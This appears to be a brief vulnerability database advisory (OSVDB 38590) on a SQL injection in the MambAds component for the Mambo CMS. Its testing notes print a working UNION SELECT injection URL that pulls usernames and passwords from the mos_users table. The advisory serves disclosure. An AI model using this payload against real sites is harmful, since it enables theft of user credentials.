MambAds Component for Mambo index.php caid Variable SQL Injection

2007-09-29T00:00:00
ID OSVDB:38590
Type osvdb
Reporter OSVDB
Modified 2007-09-29T00:00:00

Description

Manual Testing Notes

index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=999//Union//select/*/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users/

References:

ISS X-Force ID: 36875 Generic Exploit URL: http://www.milw0rm.com/exploits/4469 CVE-2007-5177 Bugtraq ID: 25865